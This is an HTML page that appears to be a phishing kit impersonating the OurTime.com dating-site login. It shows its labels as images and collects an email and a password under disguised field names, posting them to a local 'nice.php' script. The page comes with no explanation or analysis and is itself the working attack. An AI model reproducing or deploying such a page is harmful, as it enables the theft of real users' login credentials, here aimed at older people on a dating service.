<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link type="x-icon/image" href="imgz/fv.png" rel="shortcut icon" />
<title>OurTime.com - The 50+ Single Network</title>
<style type="text/css">
body {
	background-color: #FFF;
	background-image: url(imgz/bgk.png);
	background-repeat: repeat-x;
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
</style>
</head>

<body>
<div style="float:right; margin-right:10%;">
<img src="imgz/bnnr.png" />
</div>
<div style="margin-left:7%; margin-top:1%;"><img src="imgz/lgg.png" /></div>
<form method="post" action="nice.php">
<div style="height:280px; width:815px; margin-top:3%; background-color:#E2E1E3; margin-left:7%; float:left;">
<div style="margin-left:2%; padding-top:20px;"><img src="imgz/1.png" /></div>
<div style="float:right; margin-top:7%;"><img src="imgz/ad.png" /></div>
<div style="margin-top:3%; margin-left:2%; float:left;"><img src="imgz/2.png" /><input style="float:right;" type="email" name="ope" autofocus="autofocus" required="required" /></div><br /><br /><br />
<div style="margin-top:3%; margin-left:2%; float:left;"><img src="imgz/3.png" /><input style="float:right;" type="password" name="tire" required="required" /></div><br /><br /><br />
<div style="margin-left:11%; float:left;"><input type="checkbox" /><img src="imgz/rem.png" /></div><br /><br />
<div style="margin-left:11%; float:left;"><input type="image" src="imgz/sub.png" /></div>

</div>
</form>
<div style="margin-top:5%; margin-left:7%; float:left;">
<img src="imgz/grd.png" />
</div>
<div style="margin-top:5%; margin-left:15%; float:left;">
<img src="imgz/ct.png" />
</div>
</body>
</html>
